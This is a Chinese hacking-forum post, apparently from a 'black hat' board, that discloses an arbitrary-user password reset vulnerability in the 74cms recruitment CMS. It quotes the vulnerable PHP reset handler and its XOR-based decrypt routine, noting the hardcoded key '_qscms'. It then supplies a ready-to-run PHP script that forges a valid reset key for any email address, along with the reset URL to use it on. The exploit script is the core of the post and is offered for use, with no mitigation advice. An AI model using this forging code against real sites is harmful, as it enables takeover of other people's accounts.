查看: 1727|回复: 0

[系统安全] 74cms任意用户密码修改

920 主题	37 听众	1364 积分

超级版主

Rank: 8 Rank: 8

TA的每日心情

	奋斗 2019-10-18 11:20

签到天数: 678 天

[LV.9]以坛为家II

电梯直达

楼主

|只看该作者 |倒序浏览

这个任意用户密码修改比较垃圾，随便讲一下

public function user_setpass(){
if(IS_POST){
$retrievePassword = session('retrievePassword');
if($retrievePassword['token'] != I('post.token','','trim')) $this->error('非法参数！');
$user['password']=I('post.password','','trim,badword');
!$user['password'] && $this->error('请输入新密码！');
if($user['password'] != I('post.password1','','trim,badword')) $this->error('两次输入密码不相同，请重新输入！');
$passport = $this->_user_server();
if(false === $uid = $passport->edit($retrievePassword['uid'],$user)) $this->error($passport->get_error());
$tpl = 'user_setpass_sucess';
session('retrievePassword',null);
}else{
parse_str(decrypt(I('get.key','','trim')),$data);
!fieldRegex($data['e'],'email') && $this->error('找回密码失败,邮箱格式错误！','user_getpass');
$end_time=$data['t']+24*3600;
if($end_time<time()) $this->error('找回密码失败,链接过期!','user_getpass');
$key_str=substr(md5($data['e'].$data['t']),8,16);
if($key_str!=$data['k']) $this->error('找回密码失败,key错误!','user_getpass');
if(!$uid = M('Members')->where(array('email'=>$data['e']))->getfield('uid')) $this->error('找回密码失败,帐号不存在!','user_getpass');
$token=substr(md5(mt_rand(100000, 999999)), 8,16);
session('retrievePassword',array('uid'=>$uid,'token'=>$token));
$this->assign('token',$token);
}
$this->_config_seo(array('title'=>'找回密码 - '.C('qscms_site_name')));
$this->display($tpl);
}

复制代码

这里解密是用的decrypt函数，进去看一下：

function decrypt($txt, $key = '_qscms') {
$txt = passport_key(base64_decode($txt), $key);
$tmp = '';
for ($i = 0; $i < strlen($txt); $i++) {
$tmp .= $txt[$i] ^ $txt[++$i];
}
return $tmp;
}
function passport_key($txt, $encrypt_key) {
$encrypt_key = md5($encrypt_key);
$ctr = 0;
$tmp = '';
for($i = 0; $i < strlen($txt); $i++) {
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
}
return $tmp;
}

复制代码

默认密钥位_qscms，而且写死了，调用时没有传入。
所以，这里存在任意用户密码修改漏洞。
编写如下生成代码：

<?php
function encrypt($txt, $key = '_qscms') {
srand((double)microtime() * 1000000);
$encrypt_key = md5(rand(0, 32000));
$ctr = 0;
$tmp = '';
for($i = 0; $i < strlen($txt); $i++) {
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
}
return base64_encode(passport_key($tmp, $key));
}
function passport_key($txt, $encrypt_key) {
$encrypt_key = md5($encrypt_key);
$ctr = 0;
$tmp = '';
for($i = 0; $i < strlen($txt); $i++) {
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
}
return $tmp;
}
$email='example@xxx.com';
echo urlencode(encrypt(http_build_query(['e'=>$email, 'k'=>substr(md5($email.'9487070991'),8,16),'t'=>'9487070991'])));

复制代码

获取key并替换到url中，可见这里直接可以修改用户example@xxx.com的密码了：
http://demo1.xxx.com//index.php?m=&c=members&a=user_setpass&key=$key

修改密码成功：

74cms安全, 74cms漏洞, 系统安全

转播0 淘帖0 分享0 收藏0 赞0 踩0

帖子永久地址：

黑帽联盟 - 论坛版权1、本主题所有言论和图片纯属会员个人意见，与本论坛立场无关
2、本站所有主题由该帖子作者发表，该帖子作者与黑帽联盟享有帖子相关版权
3、其他单位或个人使用、转载或引用本文时必须同时征得该帖子作者和黑帽联盟的同意
4、帖子作者须承担一切因本文发表而直接或间接导致的民事或刑事法律责任
5、本帖部分内容转载自其它媒体，但并不代表本站赞同其观点和对其真实性负责
6、如本帖侵犯到任何版权问题，请立即告知本站，本站将及时予与删除并致以最深的歉意
7、黑帽联盟管理员和版主有权不事先通知发贴者而删除本文

[系统安全] 74cms任意用户密码修改

相关帖子

个人中心

		自动登录	找回密码
密码			会员注册